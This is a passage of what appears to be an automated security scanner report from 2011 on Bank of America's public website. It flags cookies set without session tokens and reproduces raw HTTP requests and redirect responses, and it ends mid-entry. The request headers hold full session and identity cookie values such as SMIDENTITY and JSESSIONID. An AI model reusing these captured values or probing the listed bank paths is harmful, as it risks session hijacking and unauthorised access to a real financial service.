The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:57 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/insurance/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=3267802795.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loansandhomes/financial-difficulty/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:07 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/loansandhomes/financial-difficulty/index.cfm?adlink=&cm_mmc=&cm_sp=&type= Connection: close Set-Cookie: BIGipServerngen-www.80=732280491.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loansandhomes/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:52 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/loansandhomes/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=1606858411.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:58 GMT Content-length: 0 Content-type: text/html Location: http://www.bankofamerica.com/onlinebanking/ Connection: close Set-Cookie: BIGipServerngen-www.80=1757853355.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:24 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale= Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:23 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale= Connection: close Set-Cookie: BIGipServerngen-www.80=3047536299.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/infocenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:22 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale= Connection: close Set-Cookie: BIGipServerngen-www.80=2714089131.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:38 GMT Content-length: 1737 Content-type: application/x-javascript Last-modified: Sat, 28 Jun 2008 02:25:22 GMT Etag: "6c9-4865a112" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/
/* OnlineOpinion (F3cS v3.1, en-US) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ if((typeof _b ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:15:11 GMT Content-length: 6886 Content-type: application/x-javascript Last-modified: Sat, 28 Jun 2008 10:20:56 GMT Etag: "1ae6-48661088" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80=1707521707.20480.0000; path=/
/* OnlineOpinion (F3cS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,O_tmof ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pap/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:01 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/pap/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=430290603.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pap/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:59 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/pap/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=3970283179.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:00 GMT Content-type: magnus-internal/cold-fusion Location: https://www.bankofamerica.com/privacy/Control.do?body=overview Connection: close Set-Cookie: BIGipServerngen-www.80=3267737259.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:01 GMT Content-type: magnus-internal/cold-fusion Location: /state.cgi?section=generic&url=search/&question_box=&ui_mode=question Connection: close Set-Cookie: BIGipServerngen-www.80=818329259.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signin/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:56 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: https://www4.bankofamerica.com/hub/index.action?template=signin Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /state.cgi HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:55 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/stateerror?referer= Connection: close Set-Cookie: BIGipServerngen-www.80=2814752427.20480.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /state.cgi?section=contact HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:55 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: cookiecheck=enabled; path=/; Location: http://www.bankofamerica.com/state.cgi?section=contact&update=&cookiecheck=yes Connection: close Set-Cookie: BIGipServerngen-www.80=432387755.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentbanking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:54 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=studentchecking&destination=nba/studentbanking/index.cfm?template=stb_overview&context= Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
